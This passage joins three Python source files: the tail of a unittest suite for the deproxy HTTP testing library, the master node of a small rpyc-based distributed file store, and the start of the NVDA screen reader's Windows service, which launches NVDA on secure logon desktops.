if self.deproxy is not None:
self.deproxy.shutdown_all_endpoints()
def handler1(self, request):
return deproxy.Response(code=606, message="Spoiler",
headers={"Header-Name": "Header-Value"},
body='Snape Kills Dumbledore')
def handler2(self, request):
return (deproxy.Response(code=606, message="Spoiler",
headers={"Header-Name": "Header-Value"},
body='Snape Kills Dumbledore'), True)
def handler3(self, request):
return (deproxy.Response(code=606, message="Spoiler",
headers={"Header-Name": "Header-Value"},
body='Snape Kills Dumbledore'), False)
def test_not_specified(self):
mc = self.deproxy.make_request(url=self.url,
default_handler=self.handler1)
self.assertEqual(len(mc.handlings), 1)
self.assertIn('server', mc.received_response.headers)
self.assertIn('date', mc.received_response.headers)
self.assertIn('Server', mc.handlings[0].response.headers)
self.assertIn('Date', mc.handlings[0].response.headers)
def test_explicit_on(self):
mc = self.deproxy.make_request(url=self.url,
default_handler=self.handler2)
self.assertEqual(len(mc.handlings), 1)
self.assertIn('server', mc.received_response.headers)
self.assertIn('date', mc.received_response.headers)
self.assertIn('Server', mc.handlings[0].response.headers)
self.assertIn('Date', mc.handlings[0].response.headers)
def test_explicit_off(self):
mc = self.deproxy.make_request(url=self.url,
default_handler=self.handler3)
self.assertEqual(len(mc.handlings), 1)
self.assertNotIn('server', mc.received_response.headers)
self.assertNotIn('date', mc.received_response.headers)
self.assertNotIn('server', mc.handlings[0].response.headers)
self.assertNotIn('date', mc.handlings[0].response.headers)
self.assertNotIn('Server', mc.received_response.headers)
self.assertNotIn('Date', mc.received_response.headers)
self.assertNotIn('Server', mc.handlings[0].response.headers)
self.assertNotIn('Date', mc.handlings[0].response.headers)
class TestHeaderCollection(unittest.TestCase):
def setUp(self):
self.headers = deproxy.HeaderCollection()
def test_length(self):
self.assertEqual(len(self.headers), 0)
self.headers.add('Name', 'Value')
self.assertEqual(len(self.headers), 1)
def test_contains(self):
self.headers.add('Name', 'Value')
self.assertTrue('Name' in self.headers)
def test_contains_case(self):
self.headers.add('Name', 'Value')
self.assertTrue('name' in self.headers)
def test_assertIn_case(self):
self.headers.add('Name', 'Value')
self.assertIn('name', self.headers)
def test_find_all(self):
self.headers.add('A', 'qwerty')
self.headers.add('B', 'asdf')
self.headers.add('C', 'zxcv')
self.headers.add('A', 'uiop')
self.headers.add('A', 'jkl;')
result = [value for value in self.headers.find_all('A')]
self.assertEqual(result, ['qwerty', 'uiop', 'jkl;'])
def test_bracket_case(self):
self.headers.add('Name', 'Value')
try:
self.assertEqual(self.headers['name'], 'Value')
except:
self.fail()
def test_get(self):
self.headers.add('Name', 'Value')
self.assertIn('name', self.headers)
self.assertEqual(self.headers.get('Name'), 'Value')
self.assertEqual(self.headers.get('name'), 'Value')
self.assertIsNone(self.headers.get('asdf'))
self.assertEqual(self.headers.get('name', default='zxcv'), 'Value')
self.assertEqual(self.headers.get('asdf', default='zxcv'), 'zxcv')
class TestBodies(unittest.TestCase):
def setUp(self):
self.deproxy = deproxy.Deproxy()
self.port = get_next_deproxy_port()
self.deproxy.add_endpoint(self.port)
self.url = 'http://localhost:{0}/'.format(self.port)
def test_request_body(self):
body = """ This is the body
This is the next paragraph.
"""
mc = self.deproxy.make_request(url=self.url, method='POST',
request_body=body)
self.assertEqual(mc.sent_request.body, body)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].request.body, body)
def test_response_body(self):
body = """ This is another body
This is the next paragraph.
"""
def custom_handler(request):
return deproxy.Response(code=200, message='OK', headers=None,
body=body)
mc = self.deproxy.make_request(url=self.url,
default_handler=custom_handler)
self.assertEqual(mc.received_response.body, body)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].response.body, body)
def test_request_body_chunked(self):
data = ["0" * 16 for _ in xrange(10)] + [""]
body = "\r\n".join(map(lambda chunk: "%0.2X\r\n%s" % (len(chunk), chunk), data))
mc = self.deproxy.make_request(url=self.url, method='POST',
headers={"Transfer-Encoding": "chunked"},
request_body=body)
self.assertEqual(mc.sent_request.body, body)
self.assertEqual(mc.sent_request.headers.get("Content-Length"), None)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].request.body, "".join(data))
def test_response_body_chunked(self):
chunked_body = "4\r\nWiki\r\n5\r\npedia\r\n0\r\n\r\n"
body = "Wikipedia"
def custom_handler(request):
return deproxy.Response(code=200, message='OK',
headers={'transfer-encoding': 'chunked'},
body=chunked_body)
mc = self.deproxy.make_request(url=self.url,
default_handler=custom_handler)
self.assertEqual(mc.received_response.body, body)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].response.body, chunked_body)
def tearDown(self):
self.deproxy.shutdown_all_endpoints()
class TestSendingHeaders(unittest.TestCase):
def setUp(self):
self.deproxy = deproxy.Deproxy()
self.port = get_next_deproxy_port()
self.deproxy.add_endpoint(self.port)
self.url = 'http://localhost:{0}/'.format(self.port)
def test_send_duplicate_request_headers(self):
headers = deproxy.HeaderCollection()
headers.add('Name', 'Value1')
headers.add('Name', 'Value2')
mc = self.deproxy.make_request(url=self.url, headers=headers)
self.assertEqual(len(mc.handlings), 1)
values = [value for value in
mc.handlings[0].request.headers.find_all('Name')]
self.assertEqual(values, ['Value1, Value2'])
def test_send_duplicate_response_headers(self):
def custom_handler(request):
headers = deproxy.HeaderCollection()
headers.add('Name', 'Value1')
headers.add('Name', 'Value2')
return deproxy.Response(code=200, message='OK', headers=headers,
body=None)
mc = self.deproxy.make_request(url=self.url,
default_handler=custom_handler)
self.assertEqual(len(mc.handlings), 1)
values = [value for value in
mc.received_response.headers.find_all('Name')]
self.assertEqual(values, ['Value1, Value2'])
def tearDown(self):
self.deproxy.shutdown_all_endpoints()
class TestPerEndpointHandlers(unittest.TestCase):
def setUp(self):
self.deproxy = deproxy.Deproxy()
self.endpoint1 = self.deproxy.add_endpoint(
name='test-endpoint-1',
port=get_next_deproxy_port())
self.endpoint2 = self.deproxy.add_endpoint(
name='test-endpoint-2',
port=get_next_deproxy_port())
def custom_handler1(request):
return deproxy.Response(code='605', message='Custom', headers={},
body=None)
def custom_handler2(request):
return deproxy.Response(code='606', message='Spoiler', headers={},
body=None)
self.custom_handler1 = custom_handler1
self.custom_handler2 = custom_handler2
self.url1 = 'http://localhost:{0}/'.format(self.endpoint1.port)
self.url2 = 'http://localhost:{0}/'.format(self.endpoint2.port)
def test_no_handlers(self):
mc = self.deproxy.make_request(url=self.url1)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].response.code, '200')
self.assertEqual(mc.received_response.code, '200')
mc = self.deproxy.make_request(url=self.url2)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].response.code, '200')
self.assertEqual(mc.received_response.code, '200')
def test_empty_handlers(self):
mc = self.deproxy.make_request(url=self.url1, handlers={})
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].response.code, '200')
self.assertEqual(mc.received_response.code, '200')
mc = self.deproxy.make_request(url=self.url2, handlers={})
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].response.code, '200')
self.assertEqual(mc.received_response.code, '200')
def test_both_handlers(self):
handlers = {self.endpoint1: self.custom_handler1,
self.endpoint2: self.custom_handler2}
mc = self.deproxy.make_request(url=self.url1, handlers=handlers)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].response.code, '605')
self.assertEqual(mc.received_response.code, '605')
mc = self.deproxy.make_request(url=self.url2, handlers=handlers)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].response.code, '606')
self.assertEqual(mc.received_response.code, '606')
def test_one_handler(self):
handlers = {self.endpoint1: self.custom_handler1}
mc = self.deproxy.make_request(url=self.url1, handlers=handlers)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].response.code, '605')
self.assertEqual(mc.received_response.code, '605')
mc = self.deproxy.make_request(url=self.url2, handlers=handlers)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].response.code, '200')
self.assertEqual(mc.received_response.code, '200')
def test_handlers_by_name(self):
handlers = {'test-endpoint-1': self.custom_handler1,
'test-endpoint-2': self.custom_handler2}
mc = self.deproxy.make_request(url=self.url1, handlers=handlers)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].response.code, '605')
self.assertEqual(mc.received_response.code, '605')
mc = self.deproxy.make_request(url=self.url2, handlers=handlers)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].response.code, '606')
self.assertEqual(mc.received_response.code, '606')
def tearDown(self):
self.deproxy.shutdown_all_endpoints()
class TestSSLEndpoint(unittest.TestCase):
def setUp(self):
self.deproxy = deproxy.Deproxy()
self.port = get_next_deproxy_port()
self.deproxy.add_endpoint(self.port,
ssl_enable=True,
ssl_certs={'certfile': './test.crt',
'keyfile': './test.key'})
self.url = 'https://localhost:{0}/'.format(self.port)
def test_ssl_request(self):
body = """ This is the body
This is the next paragraph.
"""
mc = self.deproxy.make_request(url=self.url, method='POST',
request_body=body,
ssl_options={'certfile': './test.crt',
'keyfile': './test.key'},
verify=False)
self.assertEqual(mc.sent_request.body, body)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].request.body, body)
def tearDown(self):
self.deproxy.shutdown_all_endpoints()
def run():
parser = argparse.ArgumentParser()
parser.add_argument('--port-base', help='The base port number to use when '
'assigning ports to tests. Each test case uses the '
'next lower port number than the test case before. '
'The default is 9999.', default=9999, type=int)
parser.add_argument('--print-log', action='store_true',
help='Print the log.')
args = parser.parse_args()
if args.print_log:
logging.basicConfig(level=logging.DEBUG,
format=('%(asctime)s %(levelname)s:%(name)s:'
'%(funcName)s:'
'%(filename)s(%(lineno)d):'
'%(threadName)s(%(thread)d):%(message)s'))
global deproxy_port_base
deproxy_port_base = args.port_base
unittest.main(argv=[''])
if __name__ == '__main__':
run()
|
master.py
|
import copy
import logging
import math
import os
import random
import sys
import uuid
from threading import Thread
from time import sleep
import rpyc
from rpyc.utils.server import ThreadedServer
from conf import BLOCK_SIZE, REPLICATION_FACTOR, \
DEFAULT_MINION_PORTS, DEFAULT_MASTER_PORTS, LOG_DIR
class MasterService(rpyc.Service):
class exposed_Master(object):
# Map file_name to block_ids
file_table = {} # {'file_name': [bid1, bid2, bid3]}
# Map block_id to where it's saved
block_mapping = {} # {'bid': [mid1, mid2, mid3]}
# Map mid to what's saved on it
minion_content = {} # {'mid': [bid1, bid2, bid3]}
# Register the information of every minion
minions = {} # {'mid': (host, port)}
master_list = tuple()
block_size = 0
replication_factor = 0
health_monitoring = 0
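        # Illustrative example (hypothetical ids/ports, comments only): after a
        # two-block file 'f' is written with replication_factor 2, the tables
        # could look like:
        #   file_table     = {'f': ('b1', 'b2')}
        #   block_mapping  = {'b1': [0, 1], 'b2': [1, 2]}
        #   minion_content = {0: ('b1',), 1: ('b1', 'b2'), 2: ('b2',)}
        #   minions        = {0: ('127.0.0.1', 8888), 1: (...), 2: (...)}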
def exposed_read(self, fname):
if fname in self.__class__.file_table:
return [(block_id, self.__class__.block_mapping[block_id])
for block_id in self.__class__.file_table[fname]]
return None
def exposed_delete(self, fname, prop=True):
# def siblings_delete(fname):
# for (h, p) in self.__class__.master_list:
# try:
# m = rpyc.connect(h, p)
# m.root.Master().delete(fname, False)
# except ConnectionRefusedError:
# continue
#
# if prop:
# Thread(target=siblings_delete, args=[fname]).start()
#
for block_id in self.__class__.file_table[fname]:
for mid in self.__class__.block_mapping[block_id]:
m_cont = self.__class__.minion_content[mid]
self.__class__.minion_content[mid] = \
tuple(filter(lambda x, bid=block_id: x != bid, m_cont))
del self.__class__.block_mapping[block_id]
del self.__class__.file_table[fname]
def exposed_write(self, dest, size):
if len(self.__class__.minions) < self.__class__.replication_factor:
                return 'not enough minions to hold {} replicas'.format(
                    self.__class__.replication_factor)
if self.exists(dest):
self.wipe(dest)
self.exposed_delete(dest)
self.__class__.file_table[dest] = tuple()
num_blocks = self.calc_num_blocks(size)
blocks = self.alloc_blocks(dest, num_blocks)
return blocks
def exposed_get_block_size(self):
return self.__class__.block_size
def exposed_get_minions(self, mid_list):
return tuple(self.__class__.minions.get(mid) for mid in mid_list)
def exposed_get_minion(self, mid):
return self.__class__.minions.get(mid)
def exposed_admin_delete_minion(self, mid):
            # Peacefully (intentionally) remove a minion: its data is
            # re-replicated to the remaining minions before removal.
self.exposed_replicate(mid)
# def sublings_delete_minion(mid):
# for (h, p) in self.__class__.master_list:
# try:
# m = rpyc.connect(h, p)
# m.root.Master().delete_minion(mid)
# except ConnectionRefusedError:
# continue
self.exposed_delete_minion(mid)
#Thread(target=sublings_delete_minion, args=[mid]).start()
def exposed_delete_minion(self, mid):
# 'delete minion' in a sense where we only update Master metadata
del self.__class__.minions[mid]
for block_id in self.__class__.minion_content[mid]:
b_map = self.__class__.block_mapping[block_id]
new_b_map = tuple(filter(lambda x: x != mid, b_map))
self.__class__.block_mapping[block_id] = new_b_map
# minion.delete(block_id)
del self.__class__.minion_content[mid]
def exposed_add_minion(self, host, port):
if not self.__class__.minions:
mid = 0
else:
mid = max(self.__class__.minions) + 1
self.__class__.minions[mid] = (host, port)
self.__class__.minion_content[mid] = tuple()
self.flush_attr_entry('minions', mid)
self.flush_attr_entry('minion_content', mid)
# print('[Master] add minion complete', self.__class__.minions)
def exposed_replicate(self, mid):
for block_id in self.__class__.minion_content[mid]:
locations = self.__class__.block_mapping[block_id]
source_mid = random.choice([x for x in locations if x != mid])
target_mid = random.choice([x for x in self.__class__.minions if
x not in locations])
# Replicate block from source to target
self.replicate_block(block_id, source_mid, target_mid)
# Update information registered on Master
self.__class__.block_mapping[block_id] += (target_mid,)
self.__class__.minion_content[target_mid] += (block_id,)
self.flush_attr_entry('block_mapping', block_id)
self.flush_attr_entry('minion_content', target_mid)
# current state of minion cluster
def exposed_health_report(self):
if not self.__class__.health_monitoring:
Thread(target=self.health_monitor).start()
self.__class__.health_monitoring = 1
return self.health_check()
def exposed_update_attr(self, a_name, a_value, wipe_original=False):
# update_attr is used by self.flush method.
# a_name is the table we wish to update
# a_value is the new values (in the form of tupled dict_items)
old_attr = getattr(self.__class__, a_name)
assert isinstance(old_attr, dict) and isinstance(a_value, tuple)
# update given attribute using the given update values
            # Put the existing items first so the new values in a_value win on
            # duplicate keys (dict() keeps the last occurrence of a key).
            setattr(self.__class__, a_name, dict(
                (tuple() if wipe_original else tuple(old_attr.items())) + a_value))
def exposed_update_masters(self, M):
# M is the new master list
self.__class__.master_list = M
def exposed_new_sibling(self, m):
# I, the primary master, was introduced to a new sibling
# I am going to flush all my data onto the new sibling
host, port = m
con = rpyc.connect(host, port)
siblng = con.root.Master()
for t in ('file_table', 'block_mapping',\
'minion_content', 'minions'):
table = getattr(self.__class__, t)
siblng.update_attr(t, tuple(table.items()), wipe_original=True)
###############################################################################
# Private functions
###############################################################################
def flush(self, table, entry_key, wipe):
# flush one entry in the given attr table to other masters
attr = getattr(self.__class__, table)
# if 'wipe' flag is on, it means that the entire table is flushed
update_dict = attr if wipe else {entry_key: attr[entry_key]}
# 'Yo, master brothers and sisters:
# this `table[entry_key]` got updated, I'm updating you guys.'
# TODO: parallel this.
for (h, p) in self.__class__.master_list:
try:
m = rpyc.connect(h, p)
m.root.Master().update_attr(table, \
tuple(update_dict.items()), wipe_original=wipe)
except ConnectionRefusedError:
continue
def flush_attr_entry(self, table, entry_key):
Thread(target=self.flush, args=[table, entry_key, False]).start()
def flush_attr_table(self, table):
Thread(target=self.flush, args=[table, None, True]).start()
def alloc_blocks(self, dest, num):
blocks = []
for _ in range(num):
block_uuid = str(uuid.uuid1())
                nodes_ids = random.sample(list(self.__class__.minions),
                                          self.__class__.replication_factor)
self.__class__.block_mapping[block_uuid] = nodes_ids
for mid in nodes_ids:
self.__class__.minion_content[mid] += (block_uuid,)
blocks.append((block_uuid, nodes_ids))
self.__class__.file_table[dest] += (block_uuid,)
self.flush_attr_entry('file_table', dest)
self.flush_attr_table('block_mapping')
self.flush_attr_table('minion_content')
return blocks
def calc_num_blocks(self, size):
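            # e.g. size=2500 bytes with block_size=1024 -> ceil(2500 / 1024) = 3 blocks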
return int(math.ceil(float(size) / self.__class__.block_size))
def minion_lost_handler(self, status):
# TODO
            logging.info('one or more minions dead, status: %s', status)
lost_minions = [mid for mid, value in status.items() if not value]
for mid in lost_minions:
self.exposed_admin_delete_minion(mid)
logging.info('Replicate done')
def health_monitor(self):
# actively reach out to minions forever
            # SIDE EFFECT: calls minion_lost_handler when any minion fails the health check
while 1:
minions_status = self.health_check()
if not all(minions_status.values()):
self.minion_lost_handler(minions_status)
sleep(0.2)
def health_check(self):
# reach out to known minions on file
            # RETURN {mid: 1 (alive) or 0 (unreachable)}
res = {}
minions = copy.deepcopy(self.__class__.minions)
for m, (host, port) in minions.items():
try:
con = rpyc.connect(host, port=port)
minion = con.root.Minion()
res[m] = 1 if minion.ping() == 'pong' else 0
con.close()
except ConnectionRefusedError:
res[m] = 0
return res
def exists(self, f):
return f in self.__class__.file_table
def replicate_block(self, block_id, source, target):
source_host, source_port = self.__class__.minions[source]
target_host, target_port = self.__class__.minions[target]
con = rpyc.connect(source_host, port=source_port)
minion = con.root.Minion()
minion.replicate(block_id, target_host, target_port)
def wipe(self, fname):
for block_uuid in self.__class__.file_table[fname]:
node_ids = self.__class__.block_mapping[block_uuid]
for m in self.exposed_get_minions(node_ids):
host, port = m
con = rpyc.connect(host, port=port)
minion = con.root.Minion()
minion.delete(block_uuid)
return
def startMasterService(minion_ports=DEFAULT_MINION_PORTS,
master_port=DEFAULT_MASTER_PORTS[0],
block_size=BLOCK_SIZE,
replication_factor=REPLICATION_FACTOR):
logging.basicConfig(filename=os.path.join(LOG_DIR, 'master'),
format='%(asctime)s--%(levelname)s:%(message)s',
datefmt='%m/%d/%Y %I:%M:%S %p',
level=logging.DEBUG)
# load and use conf file, restore from dump if possible.
master = MasterService.exposed_Master
master.block_size = block_size
master.replication_factor = replication_factor
# for index, minion_port in enumerate(minion_ports):
# It is ok to do so because we only test locally
# host = '127.0.0.1'
# port = minion_port
# master.minions[index + 1] = (host, port)
# master.minion_content[index + 1] = []
logging.info('Current Config:')
    logging.info('Block size: %d, replication_factor: %d, minions: %s',
master.block_size, master.replication_factor,
str(master.minions))
t = ThreadedServer(MasterService, port=master_port)
t.start()
if __name__ == '__main__':
# by default use config.py
startMasterService(master_port=int(sys.argv[1]))
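
# Minimal client sketch (comments only; host, port and file name are assumptions):
# connect to a running master over rpyc, allocate blocks for a 2 KB file, then
# look the file up again. rpyc strips the `exposed_` prefix on remote calls.
#
#   import rpyc
#   con = rpyc.connect('127.0.0.1', DEFAULT_MASTER_PORTS[0])
#   master = con.root.Master()
#   blocks = master.write('example.txt', 2048)   # -> [(block_id, [mid, ...]), ...]
#   print(master.read('example.txt'))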
|
nvda_service.py
|
#nvda_service.py
#A part of NonVisual Desktop Access (NVDA)
#Copyright (C) 2009-2011 NV Access Inc
#This file is covered by the GNU General Public License.
#See the file COPYING for more details.
from ctypes import *
from ctypes.wintypes import *
import threading
import win32serviceutil
import win32service
import sys
import os
import time
import subprocess
import _winreg
import winVersion
CREATE_UNICODE_ENVIRONMENT=1024
INFINITE = 0xffffffff
UOI_NAME = 2
SYNCHRONIZE = 0x100000
WAIT_OBJECT_0 = 0
MAXIMUM_ALLOWED = 0x2000000
SecurityIdentification = 2
TokenPrimary = 1
PROCESS_QUERY_INFORMATION = 0x0400
TokenSessionId = 12
TokenUIAccess = 26
WTS_CONSOLE_CONNECT = 0x1
WTS_CONSOLE_DISCONNECT = 0x2
WTS_SESSION_LOGON = 0x5
WTS_SESSION_LOGOFF = 0x6
WTS_SESSION_LOCK = 0x7
WTS_SESSION_UNLOCK = 0x8
WTS_CURRENT_SERVER_HANDLE = 0
WTSUserName = 5
nvdaExec = os.path.join(sys.prefix,"nvda.exe")
slaveExec = os.path.join(sys.prefix,"nvda_slave.exe")
nvdaSystemConfigDir=os.path.join(sys.prefix,'systemConfig')
class AutoHANDLE(HANDLE):
"""A HANDLE which is automatically closed when no longer in use.
"""
def __del__(self):
if self:
windll.kernel32.CloseHandle(self)
isDebug = False
def debug(msg):
if not isDebug:
return
try:
file(os.path.join(os.getenv("windir"), "temp", "nvda_service.log"), "a").write(msg + "\n")
except (OSError, IOError):
pass
def getInputDesktopName():
desktop = windll.user32.OpenInputDesktop(0, False, 0)
name = create_unicode_buffer(256)
windll.user32.GetUserObjectInformationW(desktop, UOI_NAME, byref(name), sizeof(name), None)
windll.user32.CloseDesktop(desktop)
return ur"WinSta0\%s" % name.value
class STARTUPINFO(Structure):
_fields_=[
('cb',DWORD),
('lpReserved',LPWSTR),
('lpDesktop',LPWSTR),
('lpTitle',LPWSTR),
('dwX',DWORD),
('dwY',DWORD),
('dwXSize',DWORD),
('dwYSize',DWORD),
('dwXCountChars',DWORD),
('dwYCountChars',DWORD),
('dwFillAttribute',DWORD),
('dwFlags',DWORD),
('wShowWindow',WORD),
('cbReserved2',WORD),
('lpReserved2',POINTER(c_byte)),
('hSTDInput',HANDLE),
('hSTDOutput',HANDLE),
('hSTDError',HANDLE),
]
class PROCESS_INFORMATION(Structure):
_fields_=[
('hProcess',HANDLE),
('hThread',HANDLE),
('dwProcessID',DWORD),
('dwThreadID',DWORD),
]
def getLoggedOnUserToken(session):
# Only works in Windows XP and above.
token = AutoHANDLE()
windll.wtsapi32.WTSQueryUserToken(session, byref(token))
return token
def duplicateTokenPrimary(token):
newToken = AutoHANDLE()
windll.advapi32.DuplicateTokenEx(token, MAXIMUM_ALLOWED, None, SecurityIdentification, TokenPrimary, byref(newToken))
return newToken
def getOwnToken():
process = AutoHANDLE(windll.kernel32.OpenProcess(PROCESS_QUERY_INFORMATION, False, os.getpid()))
token = AutoHANDLE()
windll.advapi32.OpenProcessToken(process, MAXIMUM_ALLOWED, byref(token))
return token
def getSessionSystemToken(session):
token = duplicateTokenPrimary(getOwnToken())
session = DWORD(session)
windll.advapi32.SetTokenInformation(token, TokenSessionId, byref(session), sizeof(DWORD))
return token
def executeProcess(desktop, token, executable, *argStrings):
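	# Launch `executable` with the given arguments on the specified desktop.
	# If a token is supplied, the process is created in that user's context
	# (CreateProcessAsUserW) with a matching environment block; otherwise it
	# runs as the current user via CreateProcessW.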
argsString=subprocess.list2cmdline(list(argStrings))
startupInfo=STARTUPINFO(cb=sizeof(STARTUPINFO),lpDesktop=desktop)
processInformation=PROCESS_INFORMATION()
cmdBuf=create_unicode_buffer(u'"%s" %s'%(executable,argsString))
if token:
env=c_void_p()
windll.userenv.CreateEnvironmentBlock(byref(env),token,False)
try:
if windll.advapi32.CreateProcessAsUserW(token, None, cmdBuf,None,None,False,CREATE_UNICODE_ENVIRONMENT,env,None,byref(startupInfo),byref(processInformation)) == 0:
raise WinError()
finally:
windll.userenv.DestroyEnvironmentBlock(env)
else:
if windll.kernel32.CreateProcessW(None, cmdBuf,None,None,False,0,None,None,byref(startupInfo),byref(processInformation)) == 0:
raise WinError()
windll.kernel32.CloseHandle(processInformation.hThread)
return AutoHANDLE(processInformation.hProcess)
def nvdaLauncher():
initDebug()
desktop = getInputDesktopName()
debug("launcher: starting with desktop %s" % desktop)
desktopBn = os.path.basename(desktop)
if desktopBn != u"Winlogon" and not desktopBn.startswith(u"InfoCard{"):
debug("launcher: user or screen-saver desktop, exiting")
return
debug("launcher: starting NVDA")
process = startNVDA(desktop)
desktopSwitchEvt = AutoHANDLE(windll.kernel32.OpenEventW(SYNCHRONIZE, False, u"WinSta0_DesktopSwitch"))
windll.kernel32.WaitForSingleObject(desktopSwitchEvt, INFINITE)
debug("launcher: desktop switch, exiting NVDA on desktop %s" % desktop)
exitNVDA(desktop)
# NVDA should never ever be left running on other desktops, so make certain it is dead.
# It may still be running if it hasn't quite finished initialising yet, in which case -q won't work.
windll.kernel32.TerminateProcess(process, 1)
def startNVDA(desktop):
token=duplicateTokenPrimary(getOwnToken())
windll.advapi32.SetTokenInformation(token,TokenUIAccess,byref(c_ulong(1)),sizeof(c_ulong))
return executeProcess(desktop, token, nvdaExec)
def exitNVDA(desktop):
token=duplicateTokenPrimary(getOwnToken())
windll.advapi32.SetTokenInformation(token,TokenUIAccess,byref(c_ulong(1)),sizeof(c_ulong))
process = executeProcess(desktop, token, nvdaExec, "-q")
windll.kernel32.WaitForSingleObject(process, 10000)
def isUserRunningNVDA(session):
token = duplicateTokenPrimary(getSessionSystemToken(session))
windll.advapi32.SetTokenInformation(token,TokenUIAccess,byref(c_ulong(1)),sizeof(c_ulong))
process = executeProcess(ur"WinSta0\Default", token, nvdaExec, u"--check-running")
windll.kernel32.WaitForSingleObject(process, INFINITE)
exitCode = DWORD()
windll.kernel32.GetExitCodeProcess(process, byref(exitCode))
return exitCode.value == 0
def isSessionLoggedOn(session):
username = c_wchar_p()
size = DWORD()
windll.wtsapi32.WTSQuerySessionInformationW(WTS_CURRENT_SERVER_HANDLE, session, WTSUserName, byref(username), byref(size))
ret = bool(username.value)
windll.wtsapi32.WTSFreeMemory(username)
return ret
def execBg(func):
t = threading.Thread(target=func)
t.setDaemon(True)
t.start()
def shouldStartOnLogonScreen():
try:
k = _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, ur"SOFTWARE\NVDA")
return bool(_winreg.QueryValueEx(k, u"startOnLogonScreen")[0])
except WindowsError:
return False
def initDebug():
global isDebug
try:
k = _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, ur"SOFTWARE\NVDA")
isDebug = bool(_winreg.QueryValueEx(k, u"serviceDebug")[0])
except WindowsError:
isDebug = False
class NVDAService(win32serviceutil.ServiceFramework):
_svc_name_="nvda"
_svc_display_name_="NVDA"
def GetAcceptedControls(self):
return win32serviceutil.ServiceFramework.GetAcceptedControls(self) | win32service.SERVICE_ACCEPT_SESSIONCHANGE
def initSession(self, session):
debug("init session %d" % session)
self.session = session
self.launcherLock = threading.RLock()
self.launcherStarted = False
self.desktopSwitchSupervisorStarted = False
self.isSessionLoggedOn = isSessionLoggedOn(session)
debug("session logged on: %r" % self.isSessionLoggedOn)
if self.isWindowsXP and session != 0 and not self.isSessionLoggedOn:
# In Windows XP, sessions other than 0 are broken before logon, so we can't do anything more here.
debug("Windows XP, returning before action")
return
if self.isSessionLoggedOn:
# The session is logged on, so treat this as a normal desktop switch.
self.handleDesktopSwitch()
else:
# We're at the logon screen.
if shouldStartOnLogonScreen():
execBg(self.startLauncher)
execBg(self.desktopSwitchSupervisor)
def desktopSwitchSupervisor(self):
if self.desktopSwitchSupervisorStarted:
return
self.desktopSwitchSupervisorStarted = True
origSession = self.session
debug("starting desktop switch supervisor, session %d" % origSession)
desktopSwitchEvt = AutoHANDLE(windll.kernel32.OpenEventW(SYNCHRONIZE, False, u"Session\%d\WinSta0_DesktopSwitch" % self.session))
if not desktopSwitchEvt:
try:
raise WinError()
except Exception, e:
debug("error opening event: %s" % e)
raise
while True:
windll.kernel32.WaitForSingleObject(desktopSwitchEvt, INFINITE)
if self.session != origSession:
break
debug("desktop switch, session %r" % self.session)
self.handleDesktopSwitch()
debug("desktop switch supervisor terminated, session %d" % origSession)
def handleDesktopSwitch(self):
with self.launcherLock:
self.launcherStarted = False
if (not self.isSessionLoggedOn and shouldStartOnLogonScreen()) or isUserRunningNVDA(self.session):
self.startLauncher()
else:
debug("not starting launcher")
def SvcOtherEx(self, control, eventType, data):
if control == win32service.SERVICE_CONTROL_SESSIONCHANGE:
self.handleSessionChange(eventType, data[0])
def handleSessionChange(self, event, session):
if event == WTS_CONSOLE_CONNECT:
debug("connect %d" % session)
if session != self.session:
self.initSession(session)
elif event == WTS_SESSION_LOGON:
debug("logon %d" % session)
self.isSessionLoggedOn = True
execBg(self.desktopSwitchSupervisor)
elif event == WTS_SESSION_LOGOFF:
debug("logoff %d" % session)
self.isSessionLoggedOn = False
if session == 0 and shouldStartOnLogonScreen():
# In XP, a logoff in session 0 does not cause a new session to be created.
# Instead, we're probably heading back to the logon screen.
execBg(self.startLauncher)
elif event == WTS_SESSION_LOCK:
debug("lock %d" % session)
# If the user was running NVDA, the desktop switch will have started NVDA on the secure desktop.
# This only needs to cover the case where the user was not running NVDA and the session is locked.
# In this case, we should treat the lock screen like the logon screen.
if session == self.session and shouldStartOnLogonScreen():
self.startLauncher()
def startLauncher(self):
with self.launcherLock:
if self.launcherStarted:
return
debug("attempt launcher start on session %d" % self.session)
token = getSessionSystemToken(self.session)
try:
process = executeProcess(ur"WinSta0\Winlogon", token, slaveExec, u"service_NVDALauncher")
self.launcherStarted = True
debug("launcher started on session %d" % self.session)
except Exception, e:
debug("error starting launcher: %s" % e)
def SvcDoRun(self):
initDebug()
debug("service starting")
self.isWindowsXP = winVersion.winVersion[0:2] == (5, 1)
self.exitEvent = threading.Event()
self.initSession(windll.kernel32.WTSGetActiveConsoleSessionId())
self.exitEvent.wait()
debug("service exiting")
def SvcStop(self):
self.exitEvent.set()
def installService(nvdaDir):
servicePath = os.path.join(nvdaDir, __name__ + ".exe")
if not os.path.isfile(servicePath):
raise RuntimeError("Could not find service executable")
win32serviceutil.InstallService(None, NVDAService._svc_name_, NVDAService._svc_display_name_, startType=win32service.SERVICE_AUTO_START, exeName=servicePath,
# Translators: The description of the NVDA service.
description=_(u"Allows NVDA to run on the Windows Logon screen, UAC screen and other secure screens."))
def removeService():
win32serviceutil.RemoveService(NVDAService._svc_name_)
def startService():
win32serviceutil.StartService(NVDAService._svc_name_)
def stopService():
"""Stop the running service and wait for its process to die.
"""
scm = win32service.OpenSCManager(None,None,win32service.SC_MANAGER_ALL_ACCESS)
try:
serv = win32service.OpenService(scm, NVDAService._svc_name_, win32service.SERVICE_ALL_ACCESS)
try:
pid = win32service.QueryServiceStatusEx(serv)["ProcessId"]
